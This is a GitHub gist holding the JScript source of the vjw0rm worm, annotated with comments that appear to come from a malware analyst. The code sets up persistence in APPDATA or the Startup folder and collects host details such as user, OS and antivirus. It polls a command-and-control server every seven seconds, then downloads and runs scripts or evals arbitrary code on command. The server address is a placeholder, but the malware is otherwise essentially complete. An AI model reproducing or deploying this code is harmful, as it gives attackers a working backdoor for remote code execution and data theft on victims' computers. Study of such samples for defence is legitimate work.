Skip to content

Instantly share code, notes, and snippets.

@drole

drole/vjw0rm

Last active Nov 19, 2020
Embed
What would you like to do?
vjw0rm
var j = [
'WScript.Shell',
'Scripting.FileSystemObject',
'Shell.Application',
'Microsoft.XMLHTTP'
];
var g = [
'HKCU',
'HKLM',
'HKCU\\vjw0rm',
'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\',
'HKLM\\SOFTWARE\\Classes\\',
'REG_SZ',
'\\defaulticon\\'
];
var y = [
'winmgmts:',
'win32_logicaldisk',
'Win32_OperatingSystem',
'AntiVirusProduct'
];
var sh = Cr(0); //'WScript.Shell'
var fs = Cr(1); //'Scripting.FileSystemObject'
var spl = '|V|'; //command and control delimiter
var Ch = '\\';
var VN = 'vjw0rm' + '_' + Ob(6); // bot ID - Ob(6) - Volume serial number
var fu = WScript.ScriptFullName; // script fullname
var wn = WScript.ScriptName; // script name
var U;
try { // attempts to create HKCU\\vjw0rm registry
U = sh.RegRead(g[2]);
} catch (err) {
var sv = fu.split('\\');
if (':\\' + sv[1] == ':\\' + wn) { // if first layer directory == to script name
U = 'TRUE';
sh.RegWrite(g[2], U, g[5]); //then set REG_SZ TRUE
} else {
U = 'FALSE';
sh.RegWrite(g[2], U, g[5]); //then set REG_SZ FALSE
}
}
Ns(); // Install malware
do { //
try {
var P = Pt('Vre', ''); // send POST request to the command and control server
P = P.split(spl); // get command from the control server
if (P[0] === 'Cl') { // Cl = Close Bot script
WScript.Quit(1);
}
if (P[0] === 'Sc') { // Sc = Save script file to %temp% and run
var s2 = Ex('temp') + '\\' + P[2];
var fi = fs.CreateTextFile(s2, true);
fi.Write(P[1]);
fi.Close();
sh.run(s2);
}
if (P[0] === 'Ex') { // Ex = execute script using Eval
eval(P[1]);
}
if (P[0] === 'Rn') { // Rn = rename bot
var ri = fs.OpenTextFile(fu, 1);
var fr = ri.ReadAll();
ri.Close();
VN = VN.split('_');
fr = fr.replace(VN[0], P[1]);
var wi = fs.OpenTextFile(fu, 2, false);
wi.Write(fr);
wi.Close();
sh.run('wscript.exe //B "' + fu + '"');
WScript.Quit(1);
}
if (P[0] === 'Up') { //Up = update bot
var s2 = Ex('temp') + '\\' + P[2];
var ctf = fs.CreateTextFile(s2, true);
var gu = P[1];
gu = gu.replace('|U|', '|V|');
ctf.Write(gu);
ctf.Close();
sh.run('wscript.exe //B "' + s2 + '"', 6);
WScript.Quit(1);
}
if (P[0] === 'Un') { // Un = uninstall bot
var s2 = P[1];
var vdr = Ex('Temp') + Ch + wn;
var regi = 'Nothing!';
s2 = s2.replace('%f', fu).replace('%n', wn).replace('%sfdr', vdr).replace('%RgNe%', regi);
eval(s2);
WScript.Quit(1);
}
if (P[0] === 'RF') { // RF = same as Sc
var s2 = Ex('temp') + '\\' + P[2];
var fi = fs.CreateTextFile(s2, true);
fi.Write(P[1]);
fi.Close();
sh.run(s2);
}
} catch (err) {
}
WScript.Sleep(7000); // phone home every 7 seconds
} while (true);
function Ex(S) {
return sh.ExpandEnvironmentStrings('%' + S + '%');
}
function Pt(C, A) { // send POST request to command and control
var X = Cr(3);
X.open('POST', '<control server>' + C, false);
X.SetRequestHeader('User-Agent:', nf()); // user agent = is the system information with the format: vjw0rm_<volume serial number>\<Username>\<OS name>\<AV product installed>\<VBC.exe installed - boolean>\<HKCU\\vjw0rm value>
X.send(A);
return X.responsetext;
}
function nf() { // get system information
var s, NT, i;
if (fs.fileexists(Ex('Windir') + '\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe')) {
NT = 'YES';
} else {
NT = 'NO';
}
//system information format: vjw0rm_<volume serial number>\<Username>\<OS name>\<AV product installed>\<VBC.exe installed - boolean>\<HKCU\\vjw0rm value>
s = VN + Ch + Ex('COMPUTERNAME') + Ch + Ex('USERNAME') + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;
return s;
}
function Cr(N) {
return new ActiveXObject(j[N]);
}
function Ob(N) {
var s;
if (N == 2) { // Get operating system
s = GetObject(y[0]).InstancesOf(y[2]);
var en = new Enumerator(s);
for (; !en.atEnd(); en.moveNext()) {
var it = en.item();
return it.Caption;
break;
}
}
if (N == 4) { // get Antivirus prodyct installed
var wmg = 'winmgmts:\\\\localhost\\root\\securitycenter';
s = GetObject(wmg).InstancesOf(y[3]);
var en = new Enumerator(s);
for (; !en.atEnd(); en.moveNext()) {
var it = en.item();
var str = it.DisplayName;
}
if (str !== '') {
wmg = wmg + '2';
s = GetObject(wmg).InstancesOf(y[3]); //y[3] = AntiVirusProduct
en = new Enumerator(s);
for (; !en.atEnd(); en.moveNext()) {
it = en.item();
return it.DisplayName;
}
} else {
return it.DisplayName;
}
}
if (N == 6) { // get Volume serial number
s = GetObject(y[0]).InstancesOf(y[1]);
var en = new Enumerator(s);
for (; !en.atEnd(); en.moveNext()) {
var it = en.item();
return it.volumeserialnumber;
break;
}
}
}
function Ns() { // install bot to appdata and startup folder
var dr = Ex('APPDATA') + Ch + wn;
try {
fs.CopyFile(fu, dr, true);
} catch (err) {
try {
var ap = Cr(2);
fs.CopyFile(fu, ap.NameSpace(7).Self.Path + '\\' + wn, true);
} catch (err) {
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.